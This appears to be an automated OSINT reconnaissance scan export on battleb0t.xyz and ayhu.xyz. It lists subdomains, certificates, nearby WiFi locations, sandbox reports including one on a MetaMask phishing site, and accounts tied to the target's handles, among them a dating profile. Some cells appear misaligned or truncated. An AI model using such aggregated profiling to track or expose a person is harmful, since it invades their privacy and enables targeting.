| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Villa (Net ID: 00:01:E3:07:FC:86) | 50.1188, 8.6843 |
| 2023-05-12 02:44:31 | Affiliate - Internet Name | No | DNS Resolver | 23 | 0 | 2 | 0 | None | cdn-185-199-111-153.github.com | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Wowhead (Category: gaming) https://www.wowhead.com/user=login | login |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css | https://www.ayhu.xyz/ |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.65): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | kekw.battleb0t.xyz | [{"url": "https://kekw.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | GHARANA (Net ID: 00:01:E3:0F:5B:9B) | 50.1188, 8.6843 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | TikTok (Category: social) https://www.tiktok.com/@_BattleB0t_?lang=en | _BattleB0t_ |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | imgur (Category: images) https://imgur.com/user/Battleb0t/about | Battleb0t |
| 2023-05-12 02:55:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://dai.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3588"\n "IsoScope_e04_IESQMMUTEX_0_519"\n "IsoScope_e04_IESQMMUTEX_0_331"\n "IsoScope_e04_ConnHashTable<3588>_HashTable_Mutex"\n "IsoScope_e04_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_e04_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3588"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dai.com"\n "www.dai.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dai.com"\n "www.dai.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"\n "104.22.14.253:80"\n "104.22.14.253:443"\n "104.16.122.175:443"\n "216.239.32.178:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpdai.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "F11KGYX1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\F11KGYX1.txt]- [targetUID: 00000000-00003588]\n "sharect_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFE2916D6CF490E071.TMP" has type "data"- Location: [%TEMP%\\~DFE2916D6CF490E071.TMP]- [targetUID: 00000000-00003588]\n "analytics_3_.js" 
has type "ASCII text with very long lines"- [targetUID: N/A]\n "mexico-blog-hero_1_.jpg" has type "JPEG image data progressive precision 8 903x495 components 3"- [targetUID: N/A]\n "_7D9BD89C-B41E-11ED-92C7-080027889E1B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_72D7BA37-B41E-11ED-92C7-080027889E1B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF6EC52A9F677717F8.TMP" has type "data"- Location: [%TEMP%\\~DF6EC52A9F677717F8.TMP]- [targetUID: 00000000-00003588]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "yjb4iuu_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "d_3_" has type "Web Open Font Format CFF length 20688 version 0.0"- [targetUID: N/A]\n "d_2_" has type "Web Open Font Format CFF length 20024 version 0.0"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "R60X53XL.htm" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\R60X53XL.htm]- [targetUID: 00000000-00002992]\n "p_1_.gif" has type "GIF image data version 89a 1 x 1"- [targetUID: N/A]\n "d_1_" has type "Web Open Font Format CFF length 20656 version 0.0"- [targetUID: N/A]\n "less-obviously-not-ethiopian_1_.jpg" has type "JPEG image data progressive precision 8 903x495 components 3"- [targetUID: N/A]\n "d_1_" has type "Web Open Font Format CFF length 20700 version 0.0"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, 
u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: www.dai.com\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nDate: Fri\n 24 Feb 2023 09:37:27 GMT\nContent-Type: text/html; charset=utf-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nLast-Modified: Thu\n 23 Feb 2023 18:42:16 GMT\nVary: Accept-Encoding\nAccess-Control-Allow-Origin: *\nexpires: Fri\n 24 Feb 2023 09:47:27 GMT\nCache-Control: max-age=600\nx-proxy-cache: MISS\nX-GitHub-Request-Id: F7D6:6485:B658CF:FF1FFC:63F88557\nCF-Cache-Status: DYNAMIC\nServer: cloudflare\nCF-RAY: 79e73904ef6acf93-SJC\nContent-Encoding: gzip\n\n2f2b\n | 185.199.109.153 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Privately held companies of England | baffin.netcraft.com |
| 2023-05-12 02:59:50 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jloup@gzip.org | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamask3.cc/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xda8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"103.60.109.137:80"\n "185.199.111.153:443"\n "65.8.165.91:443"\n "58.216.15.119:443"\n "142.251.32.42:80"\n "142.251.46.163:443"\n "142.250.188.3:80"\n "104.16.89.50:443"\n "104.17.210.243:443"\n "104.17.214.243:443"\n "142.250.189.238:443"\n "142.250.188.3:443"\n "142.251.46.194:443"\n "142.251.46.230:443"\n "142.250.189.202:443"\n "172.217.164.118:443"\n "142.250.189.161:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamask3.cc"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /fonts/EuclidCircularB-Regular-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"\n "GET /fonts/EuclidCircularB-Bold-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.embedly.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "metamask.io"\n "metamask3.cc"\n "perf.hsforms.com"\n "s4.cnzz.com"\n "static.doubleclick.net"\n "www.gstatic.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "qk.prototype.remove=function(a){this.g&&this.g.remove(a);var b=this.h;be.remove(""+a,"/",void 0===b?"youtube.com":b)};var rk=function(){var a;return function(){a||(a=new qk("ytidb"));return a}}();" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string ""undefined"!=typeof YTConfig&&YTConfig.parsetags&&"onload"!=YTConfig.parsetags||Fp();var qq=z.onYTReady;qq&&qq();var rq=z.onYouTubeIframeAPIReady;rq&&rq();var sq=z.onYouTubePlayerAPIReady;sq&&sq();}).call(this);" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "5IBMEWA7.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as 
clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-close-black_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FE2.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FB1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "maxresdefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1280x720 components 3" and extension "jpg"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n 
"dapp-compound_1_.png" has type "Unknown" and extension "png"\n "dapp-uniswap_1_.png" has type "Unknown" and extension "png"\n "dapp-gitcoin_1_.png" has type "Unknown" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "unnamed_1_.jpg" has type "Unknown" and extension "jpg"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FB0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FB0.tmp]- [targetUID: 00000000-00000852]\n "Cab1FE1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FE1.tmp]- [targetUID: 00000000-00000852]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Explore-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wallet-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Browse-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-close-black_1_.svg" has type "SVG Scalable Vector Graphics image"- 
[targetUID: N/A]\n "social-35_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "base_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "v2_1_.js" has type "UTF-8 Unicode text with very l |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | etherum-libs.github.io |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.24): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:33 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d5:98:ae:2a:84:a2:19:ac:80:9a:6c:74:76:20:f8:3f:d8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:01 2022 GMT
Not After : Feb 15 09:44:00 2023 GMT
Subject: CN=portainer.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6D:D8:A8:24:70:8B:8F:0C:4D:0C:6C:1A:D9:1A:9A:75:25:E5:1A:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:portainer.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/ayshoo | ayshoo |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.165): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:03.171 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:03.648 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | hamaha (Category: finance)
https://hamaha.net/login | login |
| 2023-05-12 02:44:12 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
9d:49:08:08:d4:e9:44:f0:ed:d2:82:b7:e0:6b:90:98
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
Validity
Not Before: Apr 27 00:00:00 2023 GMT
Not After : May 27 23:59:59 2024 GMT
Subject: CN=*.cloudwaysapps.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:8D:8C:5E:C4:54:AD:8A:E1:77:E9:9B:F9:9B:05:E1:B8:01:8D:61:E1
X509v3 Subject Key Identifier:
C9:A4:B7:DE:EA:0B:C6:29:AD:C2:08:FF:9A:8D:BB:00:2C:61:53:C2
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Certificate Policies:
Policy: 1.3.6.1.4.1.6449.1.2.2.7
CPS: https://sectigo.com/CPS
Policy: 2.23.140.1.2.1
Authority Information Access:
CA Issuers - URI:http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
OCSP - URI:http://ocsp.sectigo.com
X509v3 Subject Alternative Name:
DNS:*.cloudwaysapps.com, DNS:cloudwaysapps.com
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Apr 27 08:49:21.510 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : DA:B6:BF:6B:3F:B5:B6:22:9F:9B:C2:BB:5C:6B:E8:70:
91:71:6C:BB:51:84:85:34:BD:A4:3D:30:48:D7:FB:AB
Timestamp : Apr 27 08:49:21.600 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : EE:CD:D0:64:D5:DB:1A:CE:C5:5C:B7:9D:B4:CD:13:A2:
32:87:46:7C:BC:EC:DE:C3:51:48:59:46:71:1F:B5:9B
Timestamp : Apr 27 08:49:21.550 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| kekw.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Shuttle (Net ID: 00:01:36:07:54:71) | 52.3759, 4.8975 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 20:16:54.437 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 20:16:54.945 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
